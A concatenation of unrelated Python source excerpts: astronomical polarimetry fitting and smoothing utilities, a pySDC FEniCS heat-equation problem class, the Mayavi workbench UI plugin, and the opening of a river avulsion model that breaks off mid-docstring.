    #   to the RSScolpolcam optics model.
    # Returns: (dYX_d, drot, dyxOEoff_d, dYXerr_d, droterr, dyxOEofferr_d),
    #   the fitted guiding offset, rotation (deg), O/E offset correction, and
    #   their 1-sigma uncertainties (rotation and OE terms are zero if not fit).
    targets = YX_dt.shape[1]
    dYX = 0.1                               # offset for derivative
    dYX_t = 0.1*np.ones(targets)
    # model positions at the catalog coordinates, then with the field point
    # stepped by dYX in Y and in X, giving numerical derivatives dy/dY, dx/dX
    yxcat_dpt = RSScolpolcam(YX_dt,wavl,coltem,camtem)
    yxcatY_dpt = RSScolpolcam(YX_dt+np.array([dYX_t,np.zeros(targets)]),wavl,coltem,camtem)
    yxcatX_dpt = RSScolpolcam(YX_dt+np.array([np.zeros(targets),dYX_t]),wavl,coltem,camtem)
    dydY_pt = (yxcatY_dpt - yxcat_dpt)[0]/dYX
    dxdX_pt = (yxcatX_dpt - yxcat_dpt)[1]/dYX
    # off_dp applies -/+ half of the OE offset to the two beams
    off_dp = np.array([[-.5,.5],[-.5,.5]])
    # residual of measured minus predicted (catalog model + current OE offset)
    dyx_dpt = yx_dpt - (yxcat_dpt + (off_dp*yxOEoff_d[:,None])[:,:,None])
    # Fit: dyx_dpt = [dY*dydY_pt,dX*dxdX_pt] + drot*[X*dydY_pt,-Y*dxdX_pt] + off_dp*dyxOEoff_d
    # 2 coefficients (dY,dX) without the OE-offset fit; 5 with (adds drot, dy, dx)
    cofs = [2,5][fitOEoff]
    A_SC = np.zeros((4*targets,cofs))
    # stack the y equations (both beams, all targets) above the x equations
    A_SC[:2*targets,0] = dydY_pt.flatten()
    A_SC[2*targets:,1] = dxdX_pt.flatten()
    if fitOEoff:
        # rotation couples X into y and -Y into x; OE offset enters with the
        # +/- half sign pattern per beam
        A_SC[:2*targets,2] = (YX_dt[1][None,:]*dydY_pt).flatten()
        A_SC[2*targets:,2] = -(YX_dt[0][None,:]*dxdX_pt).flatten()
        A_SC[:2*targets,3] = np.repeat(off_dp[0,:,None],targets,axis=1).flatten()
        A_SC[2*targets:,4] = np.repeat(off_dp[1,:,None],targets,axis=1).flatten()
    if debug:
        np.savetxt(name+"A_SC.txt",A_SC,fmt="%8.2f")
        np.savetxt(name+"B_S.txt",dyx_dpt.flatten(),fmt="%8.2f")
    cof_C,sumsqerr = la.lstsq(A_SC,dyx_dpt.flatten())[:2]       # here is the fit
    # coefficient covariance (inverse normal matrix) for the error estimates
    eps_CC = la.inv((A_SC[:,:,None]*A_SC[:,None,:]).sum(axis=0))
    std_C = np.sqrt((sumsqerr/targets)*np.diagonal(eps_CC))
    dYX_d = cof_C[0:2]
    dYXerr_d = std_C[0:2]
    if fitOEoff:
        drot = np.degrees(cof_C[2])
        droterr = np.degrees(std_C[2])
        dyxOEoff_d = cof_C[3:]
        dyxOEofferr_d = std_C[3:]
    else:
        drot = 0.
        droterr = 0.
        dyxOEoff_d = np.zeros(2)
        dyxOEofferr_d = np.zeros(2)
    return dYX_d,drot,dyxOEoff_d,dYXerr_d,droterr,dyxOEofferr_d
# ---------------------------------------------------------------------------------
def Tableinterp(Tab,interpkey,interp_x):
    """Return a new table with every column interpolated onto *interp_x*.

    The column named *interpkey* supplies the abscissa; all other columns
    are cubic-spline interpolated onto the requested points (or simply
    repeated when the input table has a single row).
    NOTE(review): kind='cubic' needs at least 4 rows; tables of 2-3 rows
    will raise inside interp1d — confirm callers never pass those.
    """
    if np.isscalar(interp_x):
        interp_x = np.array([interp_x, ])
    colnames = Tab.colnames
    out = ta.Table(np.zeros((interp_x.shape[0], len(colnames))), names=colnames)
    out[interpkey] = interp_x
    x_old = Tab[interpkey]
    for col in [c for c in colnames if c != interpkey]:
        if len(Tab) > 1:
            out[col] = interp1d(x_old, Tab[col], kind='cubic')(interp_x)
        else:
            out[col] = Tab[col].repeat(interp_x.shape[0])
    return out
# ----------------------------------------------------------
def rotate2d(yx_ds, rot, center=np.zeros(2)):
    """Rotate an array of 2d coordinates about a center point.

    Parameters:
    yx_ds: 2d numarray of 2d coordinates
        _d: 0,1 for y,x
        _s: index of coordinates
    rot: amount to rotate (degrees)
    center: y,x coordinates of rotation center (default 0,0)

    Returns the rotated coordinates as a new (2, s) array.
    """
    cosr = np.cos(np.radians(rot))
    sinr = np.sin(np.radians(rot))
    # equivalent to the transpose([[c,s],[-s,c]]) form applied on the right
    rotmat_dd = np.array([[cosr, sinr], [-sinr, cosr]])
    rel_ds = yx_ds - center[:, None]
    return np.dot(rotmat_dd, rel_ds) + center[:, None]
# ---------------------------------------------------------------------------------
def boxsmooth1d(ar_x, ok_x, xbox, blklim):
    # sliding boxcar average (using okmask, with ok points in > blklim fraction of the box)
    # ar_x: float nparray; ok_x = bool nparray
    # xbox: int; blklim: float
    # Returns a float array the same length as ar_x; bins whose box contains
    # too few ok points (weighted count <= xbox*blklim) are set to 0.
    arr_x = ar_x*ok_x
    bins = ar_x.shape[0]
    kernel = np.ones(xbox)
    # BUGFIX: even-box test was "xbox/2. == 0" (only true for xbox==0), so the
    # centering correction below never ran.  An even box is extended by one
    # sample with half-weight ends so the kernel stays centered (weights still
    # sum to xbox).
    if xbox % 2 == 0:
        kernel[0] = 0.5
        kernel = np.append(kernel, 0.5)
    nkers = kernel.shape[0]
    # full convolution, then take the centered, same-length slice
    # (integer // keeps the slice indices ints on both Python 2 and 3)
    valmask_x = np.convolve(arr_x, kernel)[(nkers-1)//2:(nkers-1)//2+bins]
    count_x = np.convolve(ok_x, kernel)[(nkers-1)//2:(nkers-1)//2+bins]
    sm_x = np.zeros(bins)
    okbin_x = count_x > xbox*blklim
    sm_x[okbin_x] = valmask_x[okbin_x]/count_x[okbin_x]
    return sm_x
# ---------------------------------------------------------------------------------
def blksmooth2d(ar_rc,ok_rc,rblk,cblk,blklim,mode="mean",debug=False):
# blkaverage (using mask, with blks with > blklim fraction of the pts), then spline interpolate result
# optional: median instead of mean
    # Suffixes: _rc = full-resolution row,col grid; _RC = coarse block grid;
    # _b = flattened pixels within one block.  Written for Python 2
    # (integer "/" division and print statement are relied on below).
    rows,cols = ar_rc.shape
    arr_rc = np.zeros_like(ar_rc)
    arr_rc[ok_rc] = ar_rc[ok_rc]
    r_rc,c_rc = np.indices((rows,cols)).astype(float)
# equalize block scaling to avoid triangularization failure
    # NOTE(review): both become the same (larger) value, so blocks are square
    # even when different rblk/cblk were requested — appears intentional.
    rblk,cblk = max(rblk,cblk), max(rblk,cblk)
    # bounding box and center of the ok data, in unbinned pixels
    rcenter = (np.where(ok_rc)[0][-1] + np.where(ok_rc)[0][0])/2
    ccenter = ((np.where(ok_rc)[1]).max() + (np.where(ok_rc)[1]).min())/2
    drdat = (np.where(ok_rc)[0][-1] - np.where(ok_rc)[0][0])
    dcdat = ((np.where(ok_rc)[1]).max() - (np.where(ok_rc)[1]).min())
    rblks,cblks = int(np.ceil(float(drdat)/rblk)),int(np.ceil(float(dcdat)/cblk))
    # origin of the block grid, clipped so it stays inside the array
    r0 = min(max(0,rcenter-rblk*rblks/2),rows-rblk*rblks)
    c0 = min(max(0,ccenter-cblk*cblks/2),cols-cblk*cblks)
    # reshape the covered region into (rblks, cblks, pixels-per-block)
    arr_RCb = arr_rc[r0:(r0+rblk*rblks),c0:(c0+cblk*cblks)] \
        .reshape(rblks,rblk,cblks,cblk).transpose(0,2,1,3).reshape(rblks,cblks,rblk*cblk)
    ok_RCb = ok_rc[r0:(r0+rblk*rblks),c0:(c0+cblk*cblks)] \
        .reshape(rblks,rblk,cblks,cblk).transpose(0,2,1,3).reshape(rblks,cblks,rblk*cblk)
    r_RCb = ((ok_rc*r_rc)[r0:(r0+rblk*rblks),c0:(c0+cblk*cblks)]) \
        .reshape(rblks,rblk,cblks,cblk).transpose(0,2,1,3).reshape(rblks,cblks,rblk*cblk)
    c_RCb = ((ok_rc*c_rc)[r0:(r0+rblk*rblks),c0:(c0+cblk*cblks)]) \
        .reshape(rblks,rblk,cblks,cblk).transpose(0,2,1,3).reshape(rblks,cblks,rblk*cblk)
    # a block is usable only if it holds more than blklim fraction of ok points
    ok_RC = ok_RCb.sum(axis=-1) > rblk*cblk*blklim
    arr_RC = np.zeros((rblks,cblks))
    if mode == "mean":
        arr_RC[ok_RC] = arr_RCb[ok_RC].sum(axis=-1)/ok_RCb[ok_RC].sum(axis=-1)
    elif mode == "median":
        arr_RC[ok_RC] = np.median(arr_RCb[ok_RC],axis=-1)
    else:
        print "Illegal mode "+mode+" for smoothing"
        exit()
    # mean position of the ok points within each usable block
    r_RC = np.zeros_like(arr_RC); c_RC = np.zeros_like(arr_RC)
    r_RC[ok_RC] = r_RCb[ok_RC].sum(axis=-1)/ok_RCb[ok_RC].sum(axis=-1)
    c_RC[ok_RC] = c_RCb[ok_RC].sum(axis=-1)/ok_RCb[ok_RC].sum(axis=-1)
    if debug:
        np.savetxt('arr_RC.txt',arr_RC,fmt="%14.9f")
        np.savetxt('ok_RC.txt',ok_RC,fmt="%2i")
# evaluate slopes at edge for edge extrapolation
    # finite differences between adjacent nonzero blocks only
    dar_RC = ((arr_RC[1:,:]!=0.) & (arr_RC[:-1,:]!=0.)).astype(int) \
        * (arr_RC[1:,:] - arr_RC[:-1,:])
    dac_RC = ((arr_RC[:,1:]!=0.) & (arr_RC[:,:-1]!=0.)).astype(int) \
        * (arr_RC[:,1:] - arr_RC[:,:-1])
    dr_RC = r_RC[1:,:] - r_RC[:-1,:]
    dc_RC = c_RC[:,1:] - c_RC[:,:-1]
    dadr_RC = np.zeros_like(dar_RC); dadc_RC = np.zeros_like(dac_RC)
    dadr_RC[dr_RC!=0] = dar_RC[dr_RC!=0]/dr_RC[dr_RC!=0]
    dadc_RC[dc_RC!=0] = dac_RC[dc_RC!=0]/dc_RC[dc_RC!=0]
    # rows/cols of the block grid that contain at least one usable block
    argR = np.where(ok_RC.sum(axis=1)>0)[0]
    argC = np.where(ok_RC.sum(axis=0)>0)[0]
    # zero the edge slopes where the edge block itself has no data
    dadr_RC[argR[0],argC] *= (arr_RC[argR[0,],argC] > 0)
    dadr_RC[argR[-1]-1,argC] *= (arr_RC[argR[-1],argC] > 0)
    dadc_RC[argR,argC[0]] *= (arr_RC[argR,argC[0]] > 0)
    dadc_RC[argR,argC[-1]-1] *= (arr_RC[argR,argC[-1]] > 0)
# force outer block positions into a rectangle to avoid edge effects, spline interpolate
    r_RC[argR[[0,-1]][:,None],argC] = (r0+(rblk-1)/2.+rblk*argR[[0,-1]])[:,None]
    c_RC[argR[:,None],argC[[0,-1]]] = (c0+(cblk-1)/2.+cblk*argC[[0,-1]])
    ok_RC = ((r_RC > 0.) & (c_RC > 0.))
    # cubic spline interpolation of block means back onto the full grid
    arr_rc = griddata((r_RC[ok_RC],c_RC[ok_RC]),arr_RC[ok_RC], \
        tuple(np.mgrid[:rows,:cols].astype(float)),method='cubic',fill_value=0.)
    if debug:
        pyfits.PrimaryHDU(arr_rc.astype('float32')).writeto('arr_rc_0.fits',overwrite=True)
        np.savetxt('r_RC_1.txt',r_RC,fmt="%9.2f")
        np.savetxt('c_RC_1.txt',c_RC,fmt="%9.2f")
# extrapolate to original array size, zero outside
    argR_r = ((np.arange(rows) - r0)/rblk).clip(0,rblks-1).astype(int)
    argC_c = ((np.arange(cols) - c0)/cblk).clip(0,cblks-1).astype(int)
    # note: r0,c0 are reused here as the edges of the interpolated region
    r0,r1 = np.where(arr_rc.sum(axis=1)>0)[0][[0,-1]]
    c0,c1 = np.where(arr_rc.sum(axis=0)>0)[0][[0,-1]]
    # linear extrapolation by half a block beyond each edge, using edge slopes
    arr_rc[r0-rblk/2:r0,c0:c1+1] += arr_rc[r0,c0:c1+1] + \
        dadr_RC[argR[0],argC_c[c0:c1+1]]*(np.arange(-int(rblk/2),0)[:,None])
    arr_rc[r1+1:r1+rblk/2,c0:c1+1] += arr_rc[r1,c0:c1+1] + \
        dadr_RC[argR[-1]-1,argC_c[c0:c1+1]]*(np.arange(1,rblk/2)[:,None])
    arr_rc[r0-rblk/2:r1+rblk/2,c0-cblk/2:c0] += arr_rc[r0-rblk/2:r1+rblk/2,c0][:,None] + \
        dadc_RC[argR_r[r0-rblk/2:r1+rblk/2],argC[0]][:,None]*np.arange(-int(cblk/2),0)
    arr_rc[r0-rblk/2:r1+rblk/2,c1+1:c1+cblk/2] += arr_rc[r0-rblk/2:r1+rblk/2,c1][:,None] + \
        dadc_RC[argR_r[r0-rblk/2:r1+rblk/2],argC[-1]-1][:,None]*np.arange(1,cblk/2)
    # zero everything outside the original data bounding box
    arr_rc[((np.abs(r_rc-rcenter) > drdat/2) | (np.abs(c_rc-ccenter) > dcdat/2))] = 0.
    if debug:
        pyfits.PrimaryHDU(arr_rc.astype('float32')).writeto('arr_rc_1.fits',overwrite=True)
    return arr_rc
# ----------------------------------------------------------
def fence(arr):
    """Return the four quartile fences of *arr*.

    Returned in order: lower outer, lower inner, upper inner, upper outer,
    i.e. Q1-3*IQR, Q1-1.5*IQR, Q3+1.5*IQR, Q3+3*IQR.
    """
    quart1, quart3 = np.percentile(arr, (25., 75.))
    spread = quart3 - quart1
    inner, outer = 1.5*spread, 3*spread
    return quart1 - outer, quart1 - inner, quart3 + inner, quart3 + outer
# ---------------------------------------------------------------------------------
def printstdlog(string,logfile):
print string
print >>open(logfile,'a'), string
return
|
|
import logging
import dolfin as df
import numpy as np
from pySDC.core.Errors import ParameterError
from pySDC.core.Problem import ptype
from pySDC.implementations.datatype_classes.fenics_mesh import fenics_mesh, rhs_fenics_mesh
# noinspection PyUnusedLocal
class fenics_heat(ptype):
    """
    Example implementing the forced 1D heat equation with Dirichlet-0 BC in [0,1]

    Attributes:
        V: function space
        M: mass matrix for FEM
        K: stiffness matrix incl. diffusion coefficient (and correct sign)
        g: forcing term
        bc: boundary conditions
    """

    def __init__(self, problem_params, dtype_u=fenics_mesh, dtype_f=rhs_fenics_mesh):
        """
        Initialization routine

        Args:
            problem_params (dict): custom parameters for the example
                (requires 'c_nvars', 't0', 'family', 'order', 'refinements', 'nu')
            dtype_u: FEniCS mesh data type (will be passed to parent class)
            dtype_f: FEniCS mesh data type with implicit and explicit parts (will be passed to parent class)
        """
        # define the Dirichlet boundary
        # def Boundary(x, on_boundary):
        #     return on_boundary
        # these parameters will be used later, so assert their existence
        essential_keys = ['c_nvars', 't0', 'family', 'order', 'refinements', 'nu']
        for key in essential_keys:
            if key not in problem_params:
                msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))
                raise ParameterError(msg)
        # set logger level for FFC and dolfin
        logging.getLogger('FFC').setLevel(logging.WARNING)
        logging.getLogger('UFL').setLevel(logging.WARNING)
        # set solver and form parameters
        df.parameters["form_compiler"]["optimize"] = True
        df.parameters["form_compiler"]["cpp_optimize"] = True
        df.parameters['allow_extrapolation'] = True
        # set mesh and refinement (for multilevel)
        mesh = df.UnitIntervalMesh(problem_params['c_nvars'])
        for _ in range(problem_params['refinements']):
            mesh = df.refine(mesh)
        # define function space for future reference
        self.V = df.FunctionSpace(mesh, problem_params['family'], problem_params['order'])
        tmp = df.Function(self.V)
        print('DoFs on this level:', len(tmp.vector()[:]))
        # invoke super init, passing number of dofs, dtype_u and dtype_f
        super(fenics_heat, self).__init__(self.V, dtype_u, dtype_f, problem_params)
        # Stiffness term (Laplace), with diffusion coefficient nu folded in
        u = df.TrialFunction(self.V)
        v = df.TestFunction(self.V)
        a_K = -1.0 * df.inner(df.nabla_grad(u), self.params.nu * df.nabla_grad(v)) * df.dx
        # Mass term
        a_M = u * v * df.dx
        self.M = df.assemble(a_M)
        self.K = df.assemble(a_K)
        # set forcing term as expression (matches the exact solution in u_exact)
        self.g = df.Expression('-cos(a*x[0]) * (sin(t) - b*a*a*cos(t))', a=np.pi, b=self.params.nu, t=self.params.t0,
                               degree=self.params.order)
        # self.g = df.Expression('0', a=np.pi, b=self.params.nu, t=self.params.t0,
        #                        degree=self.params.order)
        # set boundary values
        # bc = df.DirichletBC(self.V, df.Constant(0.0), Boundary)
        #
        # bc.apply(self.M)
        # bc.apply(self.K)

    def solve_system(self, rhs, factor, u0, t):
        """
        Dolfin's linear solver for (M-dtA)u = rhs
        (the right-hand side is first multiplied by the mass matrix here)

        Args:
            rhs (dtype_f): right-hand side for the nonlinear system
            factor (float): abbrev. for the node-to-node stepsize (or any other factor required)
            u0 (dtype_u): initial guess for the iterative solver (not used here so far)
            t (float): current time
        Returns:
            dtype_u: solution as mesh
        """
        b = self.apply_mass_matrix(rhs)
        u = self.dtype_u(u0)
        df.solve(self.M - factor * self.K, u.values.vector(), b.values.vector())
        return u

    def __eval_fexpl(self, u, t):
        """
        Helper routine to evaluate the explicit part of the RHS
        (the forcing term g, interpolated at time t)

        Args:
            u (dtype_u): current values (not used here)
            t (float): current time
        Returns:
            explicit part of RHS
        """
        self.g.t = t
        fexpl = self.dtype_u(df.interpolate(self.g, self.V))
        return fexpl

    def __eval_fimpl(self, u, t):
        """
        Helper routine to evaluate the implicit part of the RHS
        (the diffusion term, as inv(M)*K*u)

        Args:
            u (dtype_u): current values
            t (float): current time (not used here)
        Returns:
            implicit part of RHS
        """
        tmp = self.dtype_u(self.V)
        self.K.mult(u.values.vector(), tmp.values.vector())
        fimpl = self.__invert_mass_matrix(tmp)
        return fimpl

    def eval_f(self, u, t):
        """
        Routine to evaluate both parts of the RHS

        Args:
            u (dtype_u): current values
            t (float): current time
        Returns:
            dtype_f: the RHS divided into two parts
        """
        f = self.dtype_f(self.V)
        f.impl = self.__eval_fimpl(u, t)
        f.expl = self.__eval_fexpl(u, t)
        return f

    def apply_mass_matrix(self, u):
        """
        Routine to apply mass matrix

        Args:
            u (dtype_u): current values
        Returns:
            dtype_u: M*u
        """
        me = self.dtype_u(self.V)
        self.M.mult(u.values.vector(), me.values.vector())
        return me

    def __invert_mass_matrix(self, u):
        """
        Helper routine to invert mass matrix

        Args:
            u (dtype_u): current values
        Returns:
            dtype_u: inv(M)*u
        """
        me = self.dtype_u(self.V)
        b = self.dtype_u(u)
        df.solve(self.M, me.values.vector(), b.values.vector())
        return me

    def u_exact(self, t):
        """
        Routine to compute the exact solution at time t

        Args:
            t (float): current time
        Returns:
            dtype_u: exact solution
        """
        u0 = df.Expression('cos(a*x[0]) * cos(t)', a=np.pi, t=t, degree=self.params.order)
        me = self.dtype_u(df.interpolate(u0, self.V))
        return me
# noinspection PyUnusedLocal
class fenics_heat_mass(fenics_heat):
    """
    Example implementing the forced 1D heat equation with Dirichlet-0 BC in [0,1], expects mass matrix sweeper
    """

    def solve_system(self, rhs, factor, u0, t):
        """
        Dolfin's linear solver for (M-dtA)u = rhs

        Unlike the base class, *rhs* is used directly without applying the
        mass matrix first (a mass-matrix sweeper is assumed to supply it
        already in weak form).

        Args:
            rhs (dtype_f): right-hand side for the nonlinear system
            factor (float): abbrev. for the node-to-node stepsize (or any other factor required)
            u0 (dtype_u): initial guess for the iterative solver (not used here so far)
            t (float): current time
        Returns:
            dtype_u: solution as mesh
        """
        u = self.dtype_u(u0)
        df.solve(self.M - factor * self.K, u.values.vector(), rhs.values.vector())
        return u

    def eval_f(self, u, t):
        """
        Routine to evaluate both parts of the RHS

        Both parts are returned in weak form: K*u for the implicit part and
        M*g for the explicit (forcing) part.

        Args:
            u (dtype_u): current values
            t (float): current time
        Returns:
            dtype_f: the RHS divided into two parts
        """
        f = self.dtype_f(self.V)
        self.K.mult(u.values.vector(), f.impl.values.vector())
        self.g.t = t
        f.expl = self.dtype_u(df.interpolate(self.g, self.V))
        f.expl = self.apply_mass_matrix(f.expl)
        return f
|
|
"""The Mayavi UI plugin
"""
# Author: Prabhu Ramachandran <prabhu [at] aero . iitb . ac . in>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
# Standard library imports.
import logging
# Enthought library imports.
from traits.api import List, on_trait_change
from envisage.api import Plugin
from pyface.workbench.api import Perspective, PerspectiveItem
from traits.etsconfig.api import ETSConfig
logger = logging.getLogger()  # root logger; used for the warnings below

# View IDs.
# Workbench view identifiers: the first two are contributed by this plugin,
# the shell and logger views are presumably contributed by other plugins
# and only looked up here.
ENGINE_VIEW = 'mayavi.core.ui.engine_view.EngineView'
CURRENT_SELECTION_VIEW = 'mayavi.core.engine.Engine.current_selection'
SHELL_VIEW = 'envisage.plugins.python_shell_view'
LOGGER_VIEW = 'apptools.logger.plugin.view.logger_view.LoggerView'
###############################################################################
# `MayaviPerspective` class.
###############################################################################
class MayaviPerspective(Perspective):
    """ A default perspective for Mayavi. """

    # The perspective's name.
    name = 'Mayavi'

    # Should this perspective be enabled or not?
    enabled = True

    # Should the editor area be shown in this perspective?
    show_editor_area = True

    # The contents of the perspective.
    contents = List()

    def _contents_default(self):
        """Build the default layout: engine view on the left, the object
        editor below it, and the shell (plus, where safe, the logger) at
        the bottom."""
        items = [
            PerspectiveItem(id=ENGINE_VIEW, position='left'),
            PerspectiveItem(id=CURRENT_SELECTION_VIEW, position='bottom',
                            relative_to=ENGINE_VIEW),
            PerspectiveItem(id=SHELL_VIEW, position='bottom'),
        ]
        if self._logger_view_is_safe():
            items.append(PerspectiveItem(id=LOGGER_VIEW, position='with',
                                         relative_to=SHELL_VIEW))
        return items

    def _logger_view_is_safe(self):
        """Return False only under wx 2.6, where showing the logger view
        crashes (bugware carried over from the original layout code)."""
        if ETSConfig.toolkit == 'wx':
            import wx
            return wx.__version__.split('.')[:2] != ['2', '6']
        return True
###############################################################################
# `MayaviUIPlugin` class.
###############################################################################
class MayaviUIPlugin(Plugin):
    """The Mayavi workbench UI plugin.

    Contributes the engine and object-editor views, the default Mayavi
    perspective, preference pages, the UI action sets and an IPython
    banner to an Envisage workbench application, and binds convenience
    names on the Python shell once the GUI has started.
    """

    # Extension point Ids.
    VIEWS = 'envisage.ui.workbench.views'
    PERSPECTIVES = 'envisage.ui.workbench.perspectives'
    PREFERENCES_PAGES = 'envisage.ui.workbench.preferences_pages'
    ACTION_SETS = 'envisage.ui.workbench.action_sets'
    BANNER = 'envisage.plugins.ipython_shell.banner'

    # The plugins name.
    name = 'Mayavi UI plugin'

    # Our ID.
    id = 'mayavi_ui'

    ###### Contributions to extension points made by this plugin ######

    # Views.
    views = List(contributes_to=VIEWS)

    # Perspectives.
    perspectives = List(contributes_to=PERSPECTIVES)

    # Preferences pages.
    preferences_pages = List(contributes_to=PREFERENCES_PAGES)

    # Our action sets.
    action_sets = List(contributes_to=ACTION_SETS)

    # IPython banner
    banner = List(contributes_to=BANNER)

    def _views_default(self):
        """ Trait initializer: view factories contributed to the workbench. """
        return [self._engine_view_factory,
                self._current_selection_view_factory]

    def _perspectives_default(self):
        """ Trait initializer. """
        return [MayaviPerspective]

    def _preferences_pages_default(self):
        """ Trait initializer. """
        # Imported lazily to keep plugin startup light.
        from mayavi.preferences.mayavi_preferences_page import (
            MayaviRootPreferencesPage, MayaviMlabPreferencesPage)
        return [MayaviRootPreferencesPage, MayaviMlabPreferencesPage]

    def _action_sets_default(self):
        """ Trait initializer. """
        from mayavi.plugins.mayavi_ui_action_set import (
            MayaviUIActionSet
        )
        return [MayaviUIActionSet]

    def _banner_default(self):
        """Trait initializer """
        return ["""Welcome to Mayavi, this is the interactive IPython shell.
If this is your first time using Mayavi, take a quick look at the tutorial examples section of the user guide, accessible via the help menu.
To use Mayavi, you need to load your data in "data sources" and apply "visualization modules" to it.
"""]

    ######################################################################
    # Private methods.
    def _engine_view_factory(self, window, **traits):
        """ Factory method for engine views. """
        from pyface.workbench.traits_ui_view import \
                TraitsUIView
        from mayavi.core.ui.engine_view import \
                EngineView

        engine_view = EngineView(engine=self._get_engine(window))
        tui_engine_view = TraitsUIView(obj=engine_view,
                                       id=ENGINE_VIEW,
                                       name='Mayavi',
                                       window=window,
                                       position='left',
                                       **traits
                                       )
        return tui_engine_view

    def _current_selection_view_factory(self, window, **traits):
        """ Factory method for the current selection of the engine. """
        from pyface.workbench.traits_ui_view import \
                TraitsUIView

        engine = self._get_engine(window)
        tui_engine_view = TraitsUIView(obj=engine,
                                       view='current_selection_view',
                                       id=CURRENT_SELECTION_VIEW,
                                       name='Mayavi object editor',
                                       window=window,
                                       position='bottom',
                                       relative_to=ENGINE_VIEW,
                                       **traits
                                       )
        return tui_engine_view

    def _get_engine(self, window):
        """Return the Mayavi engine of the particular window."""
        from mayavi.core.engine import Engine
        return window.get_service(Engine)

    def _get_script(self, window):
        """Return the `mayavi.plugins.script.Script` instance
        of the window."""
        from mayavi.plugins.script import Script
        return window.get_service(Script)

    ######################################################################
    # Trait handlers.
    @on_trait_change('application.gui:started')
    def _on_application_gui_started(self, obj, trait_name, old, new):
        """This is called when the application's GUI is started.  The
        method binds the `Script` and `Engine` instance on the
        interpreter.
        """
        # This is called when the application trait is set but we don't
        # want to do anything at that point.
        if trait_name != 'started' or not new:
            return

        # Get the script service.
        app = self.application
        window = app.workbench.active_window
        script = self._get_script(window)

        # Get a hold of the Python shell view.
        id = SHELL_VIEW
        py = window.get_view_by_id(id)
        if py is None:
            logger.warn('*'*80)
            logger.warn("Can't find the Python shell view to bind variables")
            return

        # Bind the script and engine instances to names on the
        # interpreter.
        try:
            py.bind('mayavi', script)
            py.bind('engine', script.engine)
            # The following will fail under Qt, as it needs the Pyface
            # Tree that has not been ported from Wx yet.
            from apptools.naming.ui.api import explore
            py.bind('explore', explore)
        except AttributeError, msg:
            # This can happen when the shell is not visible.
            # FIXME: fix this when the shell plugin is improved.
            logger.warn(msg)
            logger.warn("Can't find the Python shell to bind variables")
|
|
#! /usr/local/bin/python
import numpy as np
import math
from six.moves import range
from . import steep_desc, downcut, FP
from .diffuse import calc_crevasse_dep
from .avulsion_utils import (
find_point_in_path,
channel_is_superelevated,
find_path_length,
find_riv_path_length,
set_linear_slope,
fill_abandoned_channel,
)
def avulse_to_new_path(z, old, new, sea_level, channel_depth, avulsion_type,
                       slope, dx=1., dy=1.,):
    """Avulse the river to a new path.

    Given two river paths, *old* and *new*, avulse the river to a new river
    path.  If the end point of the new path is contained in the old river
    path, the resulting path is the new path up until this point and then
    the old path.  Otherwise, the resulting path is the new river path and
    will be downcut.

    Parameters
    ----------
    z : ndarray
        2D array of elevations.
    old : tuple of array_like
        Tuple of i and j indices (into *z*) for the old path.
    new : tuple of array_like
        Tuple of i and j indices (into *z*) for the new path.
    sea_level : float
        Elevation of sea level.
    channel_depth : float
        Depth of the channel.
    avulsion_type : {0, 1, 2, 3}
        The type of the avulsion.
    slope : float
        Slope used (with *dx*) to enforce a small minimum elevation above
        sea level at the end of a non-rejoining path before downcutting.
    dx : float, optional
        Spacing of columns of *z*.
    dy : float, optional
        Spacing of rows of *z*.

    Returns
    -------
    tuple
        Tuple of the new river path (as i, j indices) and the, possibly
        changed, avulsion type.

    Examples
    --------
    The following example uses a grid that looks like::

        o + * *
        * o + *
        * * + *
        * * o *
        * o * *

    The old path is marked by `o`, the new path but `+`.  The paths overlap
    (2, 2).

    >>> import numpy as np
    >>> z = np.ones((5, 4), dtype=float)
    >>> old = np.array((0, 1, 2, 3, 4)), np.array((0, 1, 2, 2, 1))
    >>> new = np.array((0, 1, 2)), np.array((1, 2, 2))
    >>> (new, atype) = avulse_to_new_path(z, old, new, 0., 0., 0, 0.)

    The new path follows the new path until the common point and then
    follows the old path.  The new avulsion type is now 2.

    >>> new
    (array([0, 1, 2, 3, 4]), array([1, 2, 2, 2, 1]))
    >>> atype
    2

    In this example the old and new paths do not overlap::

        o + * *
        * o + *
        * * o +
        * * o +
        * o * +

    >>> old = np.array((0, 1, 2, 3, 4)), np.array((0, 1, 2, 2, 1))
    >>> new = np.array((0, 1, 2, 3, 4)), np.array((1, 2, 3, 3, 3))
    >>> (new, atype) = avulse_to_new_path(z, old, new, 0., 0., 0, 0.)

    The new path is now, in fact, the actual new path and the avulsion
    type is unchanged.

    >>> new
    (array([0, 1, 2, 3, 4]), array([1, 2, 3, 3, 3]))
    >>> atype
    0
    """
    old_i, old_j = old
    new_i, new_j = new
    # sets avulsion to be regional, may be updated again below (if local)
    # maybe this should be len(test_old_x)-1?
    ind = find_point_in_path((old_i, old_j), (new_i[-1], new_j[-1]))
    if ind is not None:
        # the new course rejoins the old one: type 2, downcut only the new
        # leg and splice the remainder of the old path onto it
        avulsion_type = 2
        downcut.cut_local(new_i, new_j, z, dx=dx, dy=dy)
        new_i = np.append(new_i, old_i[ind + 1:])
        new_j = np.append(new_j, old_j[ind + 1:])
    else:
        # the new course stands alone: keep the end of the path slightly
        # above sea level, then downcut the whole new course
        max_cell_h = slope * dx
        if (z[new_i[-1], new_j[-1]] - sea_level) < (0.001 * max_cell_h):
            z[new_i[-1], new_j[-1]] = (0.001 * max_cell_h) + sea_level
        downcut.cut_new(new_i, new_j, z, sea_level, channel_depth,
                        dx=dx, dy=dy)
    return (new_i, new_j), avulsion_type
# determines if there is an avulsion along river course
def find_avulsion(riv_i, riv_j, n, super_ratio, current_SL, ch_depth,
                  short_path, splay_type, slope, splay_depth,
                  nu, dt, dx=1., dy=1.):
    """Find (and, if triggered, execute) an avulsion along the river course.

    Walks the river path, and wherever the channel is superelevated finds a
    candidate steepest-descent course.  Among candidates that shorten the
    path, the one with the steepest new-path slope becomes the avulsion;
    remaining candidate locations may receive crevasse-splay deposition
    (when *splay_type* > 0).

    Parameters
    ----------
    riv_i, riv_j : ndarray of int
        Row and column indices of the current river course.
    n : ndarray
        2D array of elevations (modified in place on avulsion/splay).
    super_ratio : float
        Superelevation ratio that triggers an avulsion.
    current_SL : float
        Current sea level.
    ch_depth : float
        Channel depth.
    short_path : int
        Unused here; kept for interface compatibility.
    splay_type : int
        Crevasse-splay style; 0 disables splay deposition.
    slope : float
        Regional slope, passed to the path-length helpers.
    splay_depth : ndarray
        Accumulated splay deposition (returned updated).
    nu, dt : float
